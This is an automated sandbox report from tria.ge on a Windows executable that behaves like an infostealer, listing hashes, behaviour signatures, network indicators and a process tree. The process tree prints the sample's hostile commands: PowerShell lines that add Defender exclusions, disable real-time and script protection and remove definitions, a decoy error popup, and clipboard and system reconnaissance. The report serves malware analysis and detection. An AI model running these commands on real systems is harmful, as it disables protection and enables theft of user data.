Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
93s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
31/01/2025, 20:43
Behavioral task
behavioral1
Sample
lGxCmyo.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
lGxCmyo.exe
Resource
win10v2004-20250129-en
General
-
Target
lGxCmyo.exe
-
Size
6.3MB
-
MD5
8b566fdf77f5acf29c6c5bd2d52eacab
-
SHA1
19842502be7711f7e4d303c71184dc0b2ac05798
-
SHA256
4dcab4dff066a113b9f2cea94b1b21837cf92f0874eb3c4fc166824546ff5271
-
SHA512
d3e12e3a8f5593a8e7eb7c78c0b27e1a2b9ba229a2ab4ff14675589617a43185a9bea8ffa4b26586e9744b39b657d143645f76bcac21f20fbab45509998c1ff6
-
SSDEEP
98304:ijcIruEVC6IEq9Vyn//5gcllxt3bzBoUv6aQ/BDyZeut1BDjRhh:WDCjTA//5gcllfrNJ6jBGwutlhh
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4684 powershell.exe 5096 powershell.exe 896 powershell.exe 1944 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts lGxCmyo.exe -
ACProtect 1.3x - 1.4x DLL software 16 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral2/files/0x000a000000023b64-21.dat acprotect behavioral2/files/0x000a000000023b57-27.dat acprotect behavioral2/files/0x000a000000023b62-29.dat acprotect behavioral2/files/0x000a000000023b5e-48.dat acprotect behavioral2/files/0x000a000000023b5d-47.dat acprotect behavioral2/files/0x0031000000023b5c-46.dat acprotect behavioral2/files/0x0031000000023b5b-45.dat acprotect behavioral2/files/0x0031000000023b5a-44.dat acprotect behavioral2/files/0x000a000000023b59-43.dat acprotect behavioral2/files/0x000a000000023b58-42.dat acprotect behavioral2/files/0x000a000000023b56-41.dat acprotect behavioral2/files/0x000a000000023b69-40.dat acprotect behavioral2/files/0x000a000000023b68-39.dat acprotect behavioral2/files/0x000a000000023b67-38.dat acprotect behavioral2/files/0x000a000000023b63-35.dat acprotect behavioral2/files/0x000a000000023b61-34.dat acprotect -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3004 cmd.exe 2076 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2208 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe 4332 lGxCmyo.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 26 discord.com 27 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com 24 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 540 tasklist.exe 1852 tasklist.exe 1860 tasklist.exe 3720 tasklist.exe 1220 tasklist.exe -
resource yara_rule behavioral2/files/0x000a000000023b64-21.dat upx behavioral2/memory/4332-25-0x0000000075310000-0x0000000075823000-memory.dmp upx behavioral2/files/0x000a000000023b57-27.dat upx behavioral2/files/0x000a000000023b62-29.dat upx behavioral2/memory/4332-32-0x00000000752B0000-0x00000000752BD000-memory.dmp upx behavioral2/files/0x000a000000023b5e-48.dat upx behavioral2/files/0x000a000000023b5d-47.dat upx behavioral2/files/0x0031000000023b5c-46.dat upx behavioral2/files/0x0031000000023b5b-45.dat upx behavioral2/files/0x0031000000023b5a-44.dat upx behavioral2/files/0x000a000000023b59-43.dat upx behavioral2/files/0x000a000000023b58-42.dat upx behavioral2/files/0x000a000000023b56-41.dat upx behavioral2/files/0x000a000000023b69-40.dat upx behavioral2/files/0x000a000000023b68-39.dat upx behavioral2/files/0x000a000000023b67-38.dat upx behavioral2/files/0x000a000000023b63-35.dat upx behavioral2/files/0x000a000000023b61-34.dat upx behavioral2/memory/4332-30-0x00000000752C0000-0x00000000752DE000-memory.dmp upx behavioral2/memory/4332-54-0x0000000075280000-0x00000000752A7000-memory.dmp upx behavioral2/memory/4332-56-0x0000000075260000-0x0000000075278000-memory.dmp upx behavioral2/memory/4332-58-0x0000000075240000-0x000000007525B000-memory.dmp upx behavioral2/memory/4332-60-0x0000000075100000-0x000000007523A000-memory.dmp upx behavioral2/memory/4332-62-0x00000000750E0000-0x00000000750F6000-memory.dmp upx behavioral2/memory/4332-64-0x0000000075090000-0x000000007509C000-memory.dmp upx behavioral2/memory/4332-66-0x0000000075060000-0x000000007508C000-memory.dmp upx behavioral2/memory/4332-73-0x0000000074C20000-0x0000000074FAD000-memory.dmp upx behavioral2/memory/4332-74-0x00000000752C0000-0x00000000752DE000-memory.dmp upx behavioral2/memory/4332-71-0x0000000074FB0000-0x0000000075059000-memory.dmp upx behavioral2/memory/4332-70-0x0000000075310000-0x0000000075823000-memory.dmp upx behavioral2/memory/4332-76-0x0000000074BB0000-0x0000000074BC0000-memory.dmp upx behavioral2/memory/4332-79-0x0000000074BA0000-0x0000000074BAC000-memory.dmp upx behavioral2/memory/4332-78-0x0000000075280000-0x00000000752A7000-memory.dmp upx behavioral2/memory/4332-81-0x0000000074A70000-0x0000000074B89000-memory.dmp upx behavioral2/memory/4332-106-0x0000000075240000-0x000000007525B000-memory.dmp upx behavioral2/memory/4332-109-0x0000000075100000-0x000000007523A000-memory.dmp upx behavioral2/memory/4332-136-0x00000000750E0000-0x00000000750F6000-memory.dmp upx behavioral2/memory/4332-219-0x0000000075060000-0x000000007508C000-memory.dmp upx behavioral2/memory/4332-242-0x0000000074FB0000-0x0000000075059000-memory.dmp upx behavioral2/memory/4332-257-0x0000000074C20000-0x0000000074FAD000-memory.dmp upx behavioral2/memory/4332-305-0x0000000075100000-0x000000007523A000-memory.dmp upx behavioral2/memory/4332-314-0x0000000074BB0000-0x0000000074BC0000-memory.dmp upx behavioral2/memory/4332-312-0x0000000074BA0000-0x0000000074BAC000-memory.dmp upx behavioral2/memory/4332-299-0x0000000075310000-0x0000000075823000-memory.dmp upx behavioral2/memory/4332-300-0x00000000752C0000-0x00000000752DE000-memory.dmp upx behavioral2/memory/4332-357-0x0000000075310000-0x0000000075823000-memory.dmp upx behavioral2/memory/4332-387-0x0000000074C20000-0x0000000074FAD000-memory.dmp upx behavioral2/memory/4332-372-0x0000000075310000-0x0000000075823000-memory.dmp upx behavioral2/memory/4332-400-0x0000000074A70000-0x0000000074B89000-memory.dmp upx behavioral2/memory/4332-399-0x0000000074BA0000-0x0000000074BAC000-memory.dmp upx behavioral2/memory/4332-398-0x0000000074BB0000-0x0000000074BC0000-memory.dmp upx behavioral2/memory/4332-397-0x0000000074FB0000-0x0000000075059000-memory.dmp upx behavioral2/memory/4332-396-0x0000000075060000-0x000000007508C000-memory.dmp upx behavioral2/memory/4332-395-0x0000000075090000-0x000000007509C000-memory.dmp upx behavioral2/memory/4332-394-0x00000000750E0000-0x00000000750F6000-memory.dmp upx behavioral2/memory/4332-393-0x0000000075100000-0x000000007523A000-memory.dmp upx behavioral2/memory/4332-392-0x0000000075240000-0x000000007525B000-memory.dmp upx behavioral2/memory/4332-391-0x0000000075260000-0x0000000075278000-memory.dmp upx behavioral2/memory/4332-390-0x0000000075280000-0x00000000752A7000-memory.dmp upx behavioral2/memory/4332-389-0x00000000752B0000-0x00000000752BD000-memory.dmp upx behavioral2/memory/4332-388-0x00000000752C0000-0x00000000752DE000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systeminfo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tree.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tree.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tree.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tree.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tree.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language getmac.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lGxCmyo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4896 WMIC.exe 628 WMIC.exe 3504 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1420 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 896 powershell.exe 4684 powershell.exe 4684 powershell.exe 4684 powershell.exe 896 powershell.exe 896 powershell.exe 5096 powershell.exe 5096 powershell.exe 5096 powershell.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 4088 powershell.exe 4088 powershell.exe 4088 powershell.exe 1944 powershell.exe 1944 powershell.exe 2628 powershell.exe 2628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 540 tasklist.exe Token: SeDebugPrivilege 4684 powershell.exe Token: SeDebugPrivilege 896 powershell.exe Token: SeIncreaseQuotaPrivilege 4892 WMIC.exe Token: SeSecurityPrivilege 4892 WMIC.exe Token: SeTakeOwnershipPrivilege 4892 WMIC.exe Token: SeLoadDriverPrivilege 4892 WMIC.exe Token: SeSystemProfilePrivilege 4892 WMIC.exe Token: SeSystemtimePrivilege 4892 WMIC.exe Token: SeProfSingleProcessPrivilege 4892 WMIC.exe Token: SeIncBasePriorityPrivilege 4892 WMIC.exe Token: SeCreatePagefilePrivilege 4892 WMIC.exe Token: SeBackupPrivilege 4892 WMIC.exe Token: SeRestorePrivilege 4892 WMIC.exe Token: SeShutdownPrivilege 4892 WMIC.exe Token: SeDebugPrivilege 4892 WMIC.exe Token: SeSystemEnvironmentPrivilege 4892 WMIC.exe Token: SeRemoteShutdownPrivilege 4892 WMIC.exe Token: SeUndockPrivilege 4892 WMIC.exe Token: SeManageVolumePrivilege 4892 WMIC.exe Token: 33 4892 WMIC.exe Token: 34 4892 WMIC.exe Token: 35 4892 WMIC.exe Token: 36 4892 WMIC.exe Token: SeIncreaseQuotaPrivilege 4892 WMIC.exe Token: SeSecurityPrivilege 4892 WMIC.exe Token: SeTakeOwnershipPrivilege 4892 WMIC.exe Token: SeLoadDriverPrivilege 4892 WMIC.exe Token: SeSystemProfilePrivilege 4892 WMIC.exe Token: SeSystemtimePrivilege 4892 WMIC.exe Token: SeProfSingleProcessPrivilege 4892 WMIC.exe Token: SeIncBasePriorityPrivilege 4892 WMIC.exe Token: SeCreatePagefilePrivilege 4892 WMIC.exe Token: SeBackupPrivilege 4892 WMIC.exe Token: SeRestorePrivilege 4892 WMIC.exe Token: SeShutdownPrivilege 4892 WMIC.exe Token: SeDebugPrivilege 4892 WMIC.exe Token: SeSystemEnvironmentPrivilege 4892 WMIC.exe Token: SeRemoteShutdownPrivilege 4892 WMIC.exe Token: SeUndockPrivilege 4892 WMIC.exe Token: SeManageVolumePrivilege 4892 WMIC.exe Token: 33 4892 WMIC.exe Token: 34 4892 WMIC.exe Token: 35 4892 WMIC.exe Token: 36 4892 WMIC.exe Token: SeIncreaseQuotaPrivilege 628 WMIC.exe Token: SeSecurityPrivilege 628 WMIC.exe Token: SeTakeOwnershipPrivilege 628 WMIC.exe Token: SeLoadDriverPrivilege 628 WMIC.exe Token: SeSystemProfilePrivilege 628 WMIC.exe Token: SeSystemtimePrivilege 628 WMIC.exe Token: SeProfSingleProcessPrivilege 628 WMIC.exe Token: SeIncBasePriorityPrivilege 628 WMIC.exe Token: SeCreatePagefilePrivilege 628 WMIC.exe Token: SeBackupPrivilege 628 WMIC.exe Token: SeRestorePrivilege 628 WMIC.exe Token: SeShutdownPrivilege 628 WMIC.exe Token: SeDebugPrivilege 628 WMIC.exe Token: SeSystemEnvironmentPrivilege 628 WMIC.exe Token: SeRemoteShutdownPrivilege 628 WMIC.exe Token: SeUndockPrivilege 628 WMIC.exe Token: SeManageVolumePrivilege 628 WMIC.exe Token: 33 628 WMIC.exe Token: 34 628 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2152 wrote to memory of 4332 2152 lGxCmyo.exe 85 PID 2152 wrote to memory of 4332 2152 lGxCmyo.exe 85 PID 2152 wrote to memory of 4332 2152 lGxCmyo.exe 85 PID 4332 wrote to memory of 4780 4332 lGxCmyo.exe 87 PID 4332 wrote to memory of 4780 4332 lGxCmyo.exe 87 PID 4332 wrote to memory of 4780 4332 lGxCmyo.exe 87 PID 4332 wrote to memory of 3008 4332 lGxCmyo.exe 88 PID 4332 wrote to memory of 3008 4332 lGxCmyo.exe 88 PID 4332 wrote to memory of 3008 4332 lGxCmyo.exe 88 PID 4332 wrote to memory of 5008 4332 lGxCmyo.exe 89 PID 4332 wrote to memory of 5008 4332 lGxCmyo.exe 89 PID 4332 wrote to memory of 5008 4332 lGxCmyo.exe 89 PID 4332 wrote to memory of 4580 4332 lGxCmyo.exe 91 PID 4332 wrote to memory of 4580 4332 lGxCmyo.exe 91 PID 4332 wrote to memory of 4580 4332 lGxCmyo.exe 91 PID 4580 wrote to memory of 540 4580 cmd.exe 95 PID 4580 wrote to memory of 540 4580 cmd.exe 95 PID 4580 wrote to memory of 540 4580 cmd.exe 95 PID 4780 wrote to memory of 4684 4780 cmd.exe 96 PID 4780 wrote to memory of 4684 4780 cmd.exe 96 PID 4780 wrote to memory of 4684 4780 cmd.exe 96 PID 3008 wrote to memory of 896 3008 cmd.exe 97 PID 3008 wrote to memory of 896 3008 cmd.exe 97 PID 3008 wrote to memory of 896 3008 cmd.exe 97 PID 5008 wrote to memory of 2952 5008 cmd.exe 98 PID 5008 wrote to memory of 2952 5008 cmd.exe 98 PID 5008 wrote to memory of 2952 5008 cmd.exe 98 PID 4332 wrote to memory of 2180 4332 lGxCmyo.exe 100 PID 4332 wrote to memory of 2180 4332 lGxCmyo.exe 100 PID 4332 wrote to memory of 2180 4332 lGxCmyo.exe 100 PID 2180 wrote to memory of 4892 2180 cmd.exe 102 PID 2180 wrote to memory of 4892 2180 cmd.exe 102 PID 2180 wrote to memory of 4892 2180 cmd.exe 102 PID 4332 wrote to memory of 2084 4332 lGxCmyo.exe 103 PID 4332 wrote to memory of 2084 4332 lGxCmyo.exe 103 PID 4332 wrote to memory of 2084 4332 lGxCmyo.exe 103 PID 2084 wrote to memory of 4156 2084 cmd.exe 105 PID 2084 wrote to memory of 4156 2084 cmd.exe 105 PID 2084 wrote to memory of 4156 2084 cmd.exe 105 PID 4332 wrote to memory of 1080 4332 lGxCmyo.exe 106 PID 4332 wrote to memory of 1080 4332 lGxCmyo.exe 106 PID 4332 wrote to memory of 1080 4332 lGxCmyo.exe 106 PID 1080 wrote to memory of 3264 1080 cmd.exe 108 PID 1080 wrote to memory of 3264 1080 cmd.exe 108 PID 1080 wrote to memory of 3264 1080 cmd.exe 108 PID 4332 wrote to memory of 4032 4332 lGxCmyo.exe 109 PID 4332 wrote to memory of 4032 4332 lGxCmyo.exe 109 PID 4332 wrote to memory of 4032 4332 lGxCmyo.exe 109 PID 4032 wrote to memory of 628 4032 cmd.exe 176 PID 4032 wrote to memory of 628 4032 cmd.exe 176 PID 4032 wrote to memory of 628 4032 cmd.exe 176 PID 4332 wrote to memory of 228 4332 lGxCmyo.exe 112 PID 4332 wrote to memory of 228 4332 lGxCmyo.exe 112 PID 4332 wrote to memory of 228 4332 lGxCmyo.exe 112 PID 228 wrote to memory of 3504 228 cmd.exe 114 PID 228 wrote to memory of 3504 228 cmd.exe 114 PID 228 wrote to memory of 3504 228 cmd.exe 114 PID 4332 wrote to memory of 3408 4332 lGxCmyo.exe 115 PID 4332 wrote to memory of 3408 4332 lGxCmyo.exe 115 PID 4332 wrote to memory of 3408 4332 lGxCmyo.exe 115 PID 3408 wrote to memory of 5096 3408 cmd.exe 117 PID 3408 wrote to memory of 5096 3408 cmd.exe 117 PID 3408 wrote to memory of 5096 3408 cmd.exe 117 PID 4332 wrote to memory of 1284 4332 lGxCmyo.exe 118 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2848 attrib.exe 2796 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe"C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe"C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Invalid download (retry again)', 0, 'Error', 0+16);close()""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\SysWOW64\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Invalid download (retry again)', 0, 'Error', 0+16);close()"4⤵
- System Location Discovery: System Language Discovery
PID:2952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵
- System Location Discovery: System Language Discovery
PID:4156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:3264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:628
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:3504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- System Location Discovery: System Language Discovery
PID:1284 -
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- System Location Discovery: System Language Discovery
PID:620 -
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:1852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:3988
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- System Location Discovery: System Language Discovery
PID:2972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- System Location Discovery: System Language Discovery
PID:3004 -
